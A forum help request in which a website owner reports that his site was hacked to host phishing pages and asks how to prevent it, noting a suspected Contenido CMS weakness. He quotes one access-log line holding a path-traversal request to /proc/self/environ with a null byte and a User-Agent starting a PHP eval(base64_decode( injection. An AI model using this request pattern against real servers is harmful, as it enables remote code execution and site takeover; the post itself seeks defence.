Help please,

I have a website that someone has been able to hack and install phishing pages!

I need to set the security to make this impossible. Looking back in the logs I found this code snippet:

"GET /index.php?page=latestnews//conlib/prepend.php3?cfg[path][contenido]=../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 200 6578 "-" "<?eval(base64_decode('

After the page=latestnews there is a reference to conlib/prepend?cfg[path][contendido] which appears to install a page on the root directory from which they seem to be able to install phishing sites.

I have several sites on a dedicated FastHosts server but only 1 is being attacked?

Has anyone come across this and can recommend what to do?

Thanks

Mark

Hi marc,

I've been through the database and it doesn't appear to be a sql injection.

More like an attack through Contenido CMS which we are not using but maybe installed as standard by FastHosts.

But, I can't find out how to disable this?

My main goal is to be able to tell FastHosts that the site cannot be attacked in this way again.

Thanks